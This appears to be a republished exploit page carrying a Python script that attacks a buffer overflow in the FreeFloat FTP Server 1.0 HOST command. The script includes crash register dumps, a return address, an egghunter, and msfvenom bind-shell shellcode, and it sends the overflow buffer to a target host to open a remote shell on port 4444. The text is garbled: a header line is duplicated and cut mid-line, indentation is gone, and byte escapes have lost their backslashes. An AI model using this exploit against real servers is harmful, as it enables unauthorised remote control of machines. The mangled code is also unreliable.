FreeFloat FTP Server 1.0 HOST Buffer Overflow

Details
Category: Vulnerabilities
Hits: 601
#!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software #!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A

import socket, time

# CONNECT TO HOST
host = "10.0.0.39"
port = 21

# [*] Exact match at offset 246
#buffer = "HOST " + "x41" * 246 + "x42" * 4 + "x43" * 745 + ' '

# AFTER CRASH
#EAX 00000408
#ECX 001FC700
#EDX 77C45E74 ntdll.KiFastSystemCallRet
#EBX 0000001A
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EBP 016D13F0
#ESI 0040A29E FTPServer.0040A29E
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EIP 42424242

# !mona suggest
# 0BADF00D [+] Examining registers
# 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246)
# 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)
# 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273)

# CALL EDI - msvcrt.dll
#Found commands (All modules), item 5241
# Address=77D918F6
# Disassembly=CALL EDI
# Module Name=C:Windowssystem32msvcrt.dll

# BIND SHELL
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "x0ax00x0d"
# Payload size: 355 bytes + 4 byte egg = 359 bytes
# Final size of python file: 1710 bytes
bind_shell = "T00WT00W"
bind_shell += "xddxc2xbfx9axa8x28x21xd9x74x24xf4x5dx33"
bind_shell += "xc9xb1x53x31x7dx17x83xc5x04x03xe7xbbxca"
bind_shell += "xd4xebx54x88x17x13xa5xedx9exf6x94x2dxc4"
bind_shell += "x73x86x9dx8exd1x2bx55xc2xc1xb8x1bxcbxe6"
bind_shell += "x09x91x2dxc9x8ax8ax0ex48x09xd1x42xaax30"
bind_shell += "x1ax97xabx75x47x5axf9x2ex03xc9xedx5bx59"
bind_shell += "xd2x86x10x4fx52x7bxe0x6ex73x2ax7ax29x53"
bind_shell += "xcdxafx41xdaxd5xacx6cx94x6ex06x1ax27xa6"
bind_shell += "x56xe3x84x87x56x16xd4xc0x51xc9xa3x38xa2"
bind_shell += "x74xb4xffxd8xa2x31x1bx7ax20xe1xc7x7axe5"
bind_shell += "x74x8cx71x42xf2xcax95x55xd7x61xa1xdexd6"
bind_shell += "xa5x23xa4xfcx61x6fx7ex9cx30xd5xd1xa1x22"
bind_shell += "xb6x8ex07x29x5bxdax35x70x34x2fx74x8axc4"
bind_shell += "x27x0fxf9xf6xe8xbbx95xbax61x62x62xbcx5b"
bind_shell += "xd2xfcx43x64x23xd5x87x30x73x4dx21x39x18"
bind_shell += "x8dxcexecxb5x85x69x5fxa8x68xc9x0fx6cxc2"
bind_shell += "xa2x45x63x3dxd2x65xa9x56x7bx98x52x49x20"
bind_shell += "x15xb4x03xc8x73x6exbbx2axa0xa7x5cx54x82"
bind_shell += "x9fxcax1dxc4x18xf5x9dxc2x0ex61x16x01x8b"
bind_shell += "x90x29x0cxbbxc5xbexdax2axa4x5fxdax66x5e"
bind_shell += "xc3x49xedx9ex8ax71xbaxc9xdbx44xb3x9fxf1"
bind_shell += "xffx6dxbdx0bx99x56x05xd0x5ax58x84x95xe7"
bind_shell += "x7ex96x63xe7x3axc2x3bxbex94xbcxfdx68x57"
bind_shell += "x16x54xc6x31xfex21x24x82x78x2ex61x74x64"
bind_shell += "x9fxdcxc1x9bx10x89xc5xe4x4cx29x29x3fxd5"
bind_shell += "x59x60x1dx7cxf2x2dxf4x3cx9fxcdx23x02xa6"
bind_shell += "x4dxc1xfbx5dx4dxa0xfex1axc9x59x73x32xbc"
bind_shell += "x5dx20x33x95"

# 32 BYTE EGGHUNTER
egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7"

# CALL EDI - msvcrt.dll
eip = "xF6x18xD9x77"

buffer = "HOST " + "x41" * 246 + eip + "x90" * 10 + bind_shell + "x90" * 241 + egghunter + ' '

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
print sock.recv(1024)
sock.settimeout(10)

print "Sending buffer..."
print str(buffer)
sock.sendto(buffer, (host, port))
print "Sent!"

except:
print "socket connection failed!"

time.sleep(1)

print "Done!"